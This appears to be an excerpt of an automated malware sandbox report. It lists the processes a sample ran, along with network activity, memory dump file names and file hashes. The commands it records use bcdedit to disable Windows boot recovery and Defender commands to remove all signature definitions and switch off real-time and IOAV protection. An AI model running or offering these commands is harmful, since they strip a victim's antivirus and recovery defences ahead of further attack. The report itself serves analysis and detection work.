C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| US | 168.61.215.74:123 | time.windows.com | udp |
Files
memory/3164-115-0x0000000000000000-mapping.dmp
memory/672-116-0x0000000000000000-mapping.dmp
memory/1368-117-0x0000000000000000-mapping.dmp
memory/1164-118-0x0000000000000000-mapping.dmp
memory/972-119-0x0000000000000000-mapping.dmp
memory/2460-120-0x0000000000000000-mapping.dmp
memory/1064-121-0x0000000000000000-mapping.dmp
memory/380-122-0x0000000000000000-mapping.dmp
memory/3796-123-0x0000000000000000-mapping.dmp
memory/4000-124-0x0000000000000000-mapping.dmp
memory/1988-125-0x0000000000000000-mapping.dmp
memory/3632-126-0x0000000000000000-mapping.dmp
memory/3844-127-0x0000000000000000-mapping.dmp
memory/1472-128-0x0000000000000000-mapping.dmp
memory/3032-129-0x0000000000000000-mapping.dmp
memory/2212-130-0x0000000000000000-mapping.dmp
memory/2112-131-0x0000000000000000-mapping.dmp
memory/2092-132-0x0000000000000000-mapping.dmp
memory/1232-133-0x0000000000000000-mapping.dmp
memory/696-134-0x0000000000000000-mapping.dmp
memory/1808-135-0x0000000000000000-mapping.dmp
memory/2164-136-0x0000000000000000-mapping.dmp
memory/2376-137-0x0000000000000000-mapping.dmp
memory/1488-138-0x0000000000000000-mapping.dmp
memory/1720-139-0x0000000000000000-mapping.dmp
memory/1228-140-0x0000000000000000-mapping.dmp
memory/2200-141-0x0000000000000000-mapping.dmp
memory/2132-142-0x0000000000000000-mapping.dmp
memory/2156-143-0x0000000000000000-mapping.dmp
memory/2944-144-0x0000000000000000-mapping.dmp
memory/3668-145-0x0000000000000000-mapping.dmp
memory/668-146-0x0000000000000000-mapping.dmp
memory/2308-147-0x0000000000000000-mapping.dmp
memory/2284-148-0x0000000000000000-mapping.dmp
memory/2908-149-0x0000000000000000-mapping.dmp
memory/3912-150-0x0000000000000000-mapping.dmp
memory/2256-151-0x0000000000000000-mapping.dmp
memory/3932-152-0x0000000000000000-mapping.dmp
memory/2104-153-0x0000000000000000-mapping.dmp
memory/888-154-0x0000000000000000-mapping.dmp
memory/1216-155-0x0000000000000000-mapping.dmp
memory/1364-156-0x0000000000000000-mapping.dmp
memory/2348-157-0x0000000000000000-mapping.dmp
memory/380-158-0x0000000000000000-mapping.dmp
memory/1692-159-0x0000000000000000-mapping.dmp
memory/1396-160-0x0000000000000000-mapping.dmp
memory/1112-161-0x0000000000000000-mapping.dmp
memory/448-162-0x0000000000000000-mapping.dmp
memory/2212-163-0x0000000000000000-mapping.dmp
memory/1140-164-0x0000000000000000-mapping.dmp
memory/508-165-0x0000000000000000-mapping.dmp
memory/1092-166-0x0000000000000000-mapping.dmp
memory/968-167-0x0000000000000000-mapping.dmp
memory/2180-168-0x0000000000000000-mapping.dmp
memory/2060-169-0x0000000000000000-mapping.dmp
memory/1492-170-0x0000000000000000-mapping.dmp
memory/2120-171-0x0000000000000000-mapping.dmp
memory/3092-172-0x0000000000000000-mapping.dmp
memory/2340-173-0x0000000000000000-mapping.dmp
memory/1496-174-0x0000000000000000-mapping.dmp
memory/1028-175-0x0000000000000000-mapping.dmp
memory/2272-176-0x0000000000000000-mapping.dmp
memory/3128-177-0x0000000000000000-mapping.dmp
memory/2216-178-0x0000000000000000-mapping.dmp
memory/2108-180-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-179-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-181-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-182-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-183-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-184-0x0000021F59920000-0x0000021F59942000-memory.dmp
memory/2108-185-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-186-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-187-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-188-0x0000021F73F20000-0x0000021F73F96000-memory.dmp
memory/2108-189-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-193-0x0000021F598D0000-0x0000021F598D2000-memory.dmp
memory/2108-194-0x0000021F598D3000-0x0000021F598D5000-memory.dmp
memory/2108-195-0x0000021F598D6000-0x0000021F598D8000-memory.dmp
memory/2108-196-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-197-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-217-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-218-0x0000021F57E60000-0x0000021F57E62000-memory.dmp
memory/2108-219-0x0000021F598D8000-0x0000021F598D9000-memory.dmp
memory/3076-221-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/3076-222-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-223-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-224-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-225-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-226-0x000001D2B18F0000-0x000001D2B1912000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | daca2eb0c15c4b16335f40f34f730407 |
| SHA1 | 492da0ed645ed1b2a52c6ac6ae17f7b1ade086d8 |
| SHA256 | b1d1833e6e44405d6ce5eb3b4fa74b4964429873469c9ee96addd839bcb3e442 |
| SHA512 | 1cfd87ace13a58a07ae53101d86fbc3f908762254091df81e49d00cafb74cfa2a3e214d86ce2ed5e5ce57a10a935aee1790f80a28025cf12651535d7956e5589 |
memory/3076-228-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-229-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-230-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-231-0x000001D2B1AA0000-0x000001D2B1B16000-memory.dmp
memory/3076-232-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-236-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-237-0x000001D2958E0000-0x000001D2958E2000-memory.dmp
memory/3076-258-0x000001D297323000-0x000001D297325000-memory.dmp
memory/3076-257-0x000001D297320000-0x000001D297322000-memory.dmp
memory/3076-259-0x000001D297326000-0x000001D297328000-memory.dmp
memory/3076-262-0x000001D297328000-0x000001D297329000-memory.dmp